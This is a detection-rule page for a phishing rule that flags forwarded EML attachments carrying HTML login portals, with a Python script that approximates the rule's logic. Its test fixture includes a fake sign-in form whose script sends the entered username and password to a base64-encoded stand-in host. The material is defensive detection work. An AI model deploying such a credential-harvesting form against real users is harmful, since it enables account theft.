Attachment: EML file contains HTML attachment with login portal indicators

Sublime Rules

Summary
This detection rule targets credential phishing delivered as an EML file attachment that itself carries an HTML attachment. Bounce backs and read receipts are excluded first, by filtering on specific sender addresses and subject lines. The rule then looks for strings associated with login functionality in the HTML attachment, counting JavaScript and HTML markup separately: it fires when at least three matching indicators (for example 'username', 'login-form', 'email-form') appear in the attachment's JavaScript, or at least three appear in the HTML body. Known phishing obfuscation techniques and user-facing prompts such as 'Enter password' are also taken into account. The rule combines content, file, header and JavaScript analysis to flag the attachment.
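As an added illustration (not the Sublime rule itself, whose MQL source is not reproduced on this page), the following Python script approximates the logic described above: it parses an EML, finds EML attachments that carry an HTML attachment, counts distinct login-portal indicators separately in the attachment's `<script>` content and in the remaining HTML, flags when either count reaches three, and skips bounces and read receipts. The indicator lists beyond the three named on the page, the exclusion patterns, the obfuscation markers and the sample messages are all constructed for this example; how the real rule weighs the 'Enter password' prompt and obfuscation is not stated on the page, so they are reported as separate signals rather than used as triggers.

```python
"""Approximation of the EML-in-EML login portal detection (added example, not the Sublime rule)."""
import email
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

# 'username', 'login-form', 'email-form' come from the page; the rest are assumed for the example.
JS_INDICATORS = ("username", "login-form", "email-form", "password", "signin")
HTML_INDICATORS = ("username", "login-form", "email-form", "password", "sign in")
PROMPT_RE = re.compile(r"enter\s+(?:your\s+)?password", re.I)
OBFUSCATION_MARKERS = ("unescape(", "atob(", "fromcharcode")  # assumed markers
THRESHOLD = 3  # distinct indicators needed in the scripts, or in the HTML body

# Assumed bounce / read-receipt exclusions (the rule's exact list is not on the page).
EXCLUDED_LOCALPARTS = ("mailer-daemon", "postmaster")
EXCLUDED_SUBJECT_PREFIXES = ("undeliverable", "delivery status notification", "read:")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def is_bounce_or_receipt(msg):
    localpart = parseaddr(msg.get("From", ""))[1].split("@")[0].lower()
    subject = msg.get("Subject", "").strip().lower()
    return localpart in EXCLUDED_LOCALPARTS or subject.startswith(EXCLUDED_SUBJECT_PREFIXES)


def nested_html_attachments(msg):
    """Yield (filename, html) for text/html attachments found inside .eml attachments."""
    for part in msg.iter_attachments():
        if part.get_content_type() != "message/rfc822":
            continue
        inner = part.get_payload(0)  # the attached message, already parsed
        for sub in inner.walk():
            if sub.get_content_type() == "text/html" and sub.is_attachment():
                yield sub.get_filename() or "", sub.get_content()


def count_indicators(text, indicators):
    """Number of distinct indicator strings present, case-insensitive."""
    lowered = text.lower()
    return sum(1 for ind in indicators if ind in lowered)


def score_html(html):
    scripts = "\n".join(SCRIPT_RE.findall(html))  # JavaScript only
    body = SCRIPT_RE.sub("", html)                # everything else
    return {
        "js_hits": count_indicators(scripts, JS_INDICATORS),
        "html_hits": count_indicators(body, HTML_INDICATORS),
        "password_prompt": PROMPT_RE.search(body) is not None,
        "obfuscation": any(m in scripts.lower() for m in OBFUSCATION_MARKERS),
    }


def analyze(raw_eml):
    msg = email.message_from_string(raw_eml, policy=policy.default)
    verdict = {"flagged": False, "reason": "", "attachments": []}
    if is_bounce_or_receipt(msg):
        verdict["reason"] = "excluded: bounce or read receipt"
        return verdict
    for filename, html in nested_html_attachments(msg):
        score = dict(score_html(html), filename=filename)
        verdict["attachments"].append(score)
        if score["js_hits"] >= THRESHOLD or score["html_hits"] >= THRESHOLD:
            verdict["flagged"] = True
            verdict["reason"] = f"login portal indicators in {filename}"
    return verdict


def build_sample_eml(html, sender="colleague@example.com", subject="FW: Action required"):
    """Constructed sample: an outer message carrying an .eml that carries an HTML attachment."""
    inner = EmailMessage()
    inner["From"], inner["To"], inner["Subject"] = "noreply@example.com", "user@example.org", "Action required"
    inner.set_content("Please open the attached document to continue.")
    inner.add_attachment(html, subtype="html", filename="document.html")
    outer = EmailMessage()
    outer["From"], outer["To"], outer["Subject"] = sender, "user@example.org", subject
    outer.set_content("See attached.")
    outer.add_attachment(inner, filename="original.eml")  # becomes message/rfc822
    return outer.as_string()


# Constructed HTML attachments: a fake sign-in page and a harmless newsletter.
PHISH_HTML = """<html><body>
<form id="login-form" data-target="aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv" method="post">
  <label>Email</label><input name="username" type="text">
  <label>Enter password</label><input name="password" type="password">
  <button type="submit">Sign in</button>
</form>
<script>
  var form = document.getElementById('login-form');
  var user = form.querySelector('[name=username]');
  var pass = form.querySelector('[name=password]');
  form.addEventListener('submit', function () {
    fetch(atob(form.dataset.target), {method: 'POST', body: user.value + ':' + pass.value});
  });
</script>
</body></html>"""
BENIGN_HTML = "<html><body><h1>Quarterly newsletter</h1><p>Thanks for reading.</p></body></html>"

if __name__ == "__main__":
    print(analyze(build_sample_eml(PHISH_HTML)))
    print(analyze(build_sample_eml(BENIGN_HTML)))
    print(analyze(build_sample_eml(PHISH_HTML, "MAILER-DAEMON@example.net", "Undeliverable: Action required")))
```

Counting distinct indicators rather than raw occurrences matters here: a legitimate page can mention "password" many times, so the threshold is meant to require several different login-portal features, and the separate JavaScript count catches kits that render the form dynamically with little static markup.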
Categories
  • Endpoint
  • Web
  • Cloud
  • Application
Data Sources
  • File
  • Process
  • Network Traffic
  • Application Log
Created: 2023-06-26